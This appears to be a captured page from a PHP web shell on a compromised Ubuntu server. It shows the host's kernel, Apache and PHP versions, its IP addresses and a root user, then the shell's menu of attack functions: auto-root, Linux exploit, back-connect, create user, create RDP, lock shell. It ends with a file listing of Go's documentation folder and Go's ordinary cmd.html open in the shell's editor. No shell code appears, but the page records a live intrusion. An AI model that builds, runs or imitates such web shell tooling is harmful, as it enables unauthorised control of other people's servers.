Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
doc /
[ HOME SHELL ]
Name
Size
Permission
Action
articles
[ DIR ]
drwxr-xr-x
codewalk
[ DIR ]
drwxr-xr-x
gopher
[ DIR ]
drwxr-xr-x
play
[ DIR ]
drwxr-xr-x
progs
[ DIR ]
drwxr-xr-x
asm.html
33.62
KB
-rw-r--r--
cmd.html
2.8
KB
-rw-r--r--
contrib.html
4.91
KB
-rw-r--r--
contribute.html
36.18
KB
-rw-r--r--
debugging_with_gdb.html
16.75
KB
-rw-r--r--
diagnostics.html
17.63
KB
-rw-r--r--
editors.html
1.37
KB
-rw-r--r--
effective_go.html
114
KB
-rw-r--r--
gccgo_contribute.html
4.22
KB
-rw-r--r--
gccgo_install.html
16.63
KB
-rw-r--r--
go-logo-black.png
8.64
KB
-rw-r--r--
go-logo-blue.png
9.14
KB
-rw-r--r--
go-logo-white.png
20.97
KB
-rw-r--r--
go1.1.html
39.46
KB
-rw-r--r--
go1.10.html
57.88
KB
-rw-r--r--
go1.11.html
35.48
KB
-rw-r--r--
go1.12.html
36.98
KB
-rw-r--r--
go1.13.html
44.99
KB
-rw-r--r--
go1.14.html
34.85
KB
-rw-r--r--
go1.2.html
34.18
KB
-rw-r--r--
go1.3.html
22.56
KB
-rw-r--r--
go1.4.html
32.75
KB
-rw-r--r--
go1.5.html
46.68
KB
-rw-r--r--
go1.6.html
36.72
KB
-rw-r--r--
go1.7.html
42.68
KB
-rw-r--r--
go1.8.html
57.64
KB
-rw-r--r--
go1.9.html
36.67
KB
-rw-r--r--
go1.html
69.79
KB
-rw-r--r--
go1compat.html
7.05
KB
-rw-r--r--
go_faq.html
87.98
KB
-rw-r--r--
go_mem.html
13.26
KB
-rw-r--r--
go_spec.html
207.92
KB
-rw-r--r--
help.html
3.05
KB
-rw-r--r--
ie.css
34
B
-rw-r--r--
install-source.html
22.66
KB
-rw-r--r--
install.html
9.1
KB
-rw-r--r--
share.png
2.92
KB
-rw-r--r--
tos.html
360
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmd.html
<!--{ "Title": "Command Documentation", "Path": "/doc/cmd" }--> <p> There is a suite of programs to build and process Go source code. Instead of being run directly, programs in the suite are usually invoked by the <a href="/cmd/go/">go</a> program. </p> <p> The most common way to run these programs is as a subcommand of the go program, for instance as <code>go fmt</code>. Run like this, the command operates on complete packages of Go source code, with the go program invoking the underlying binary with arguments appropriate to package-level processing. </p> <p> The programs can also be run as stand-alone binaries, with unmodified arguments, using the go <code>tool</code> subcommand, such as <code>go tool cgo</code>. For most commands this is mainly useful for debugging. Some of the commands, such as <code>pprof</code>, are accessible only through the go <code>tool</code> subcommand. </p> <p> Finally the <code>fmt</code> and <code>godoc</code> commands are installed as regular binaries called <code>gofmt</code> and <code>godoc</code> because they are so often referenced. </p> <p> Click on the links for more documentation, invocation methods, and usage details. </p> <table class="dir"> <tr> <th>Name</th> <th> </th> <th>Synopsis</th> </tr> <tr> <td><a href="/cmd/go/">go</a></td> <td> </td> <td> The <code>go</code> program manages Go source code and runs the other commands listed here. See the command docs for usage details. <br><br> </td> </tr> <tr> <td><a href="/cmd/cgo/">cgo</a></td> <td> </td> <td>Cgo enables the creation of Go packages that call C code.</td> </tr> <tr> <td><a href="/cmd/cover/">cover</a></td> <td> </td> <td>Cover is a program for creating and analyzing the coverage profiles generated by <code>"go test -coverprofile"</code>.</td> </tr> <tr> <td><a href="/cmd/fix/">fix</a></td> <td> </td> <td>Fix finds Go programs that use old features of the language and libraries and rewrites them to use newer ones.</td> </tr> <tr> <td><a href="/cmd/gofmt/">fmt</a></td> <td> </td> <td>Fmt formats Go packages, it is also available as an independent <a href="/cmd/gofmt/"> gofmt</a> command with more general options.</td> </tr> <tr> <td><a href="//godoc.org/golang.org/x/tools/cmd/godoc/">godoc</a></td> <td> </td> <td>Godoc extracts and generates documentation for Go packages.</td> </tr> <tr> <td><a href="/cmd/vet/">vet</a></td> <td> </td> <td>Vet examines Go source code and reports suspicious constructs, such as Printf calls whose arguments do not align with the format string.</td> </tr> </table> <p> This is an abridged list. See the <a href="/cmd/">full command reference</a> for documentation of the compilers and more. </p>
Close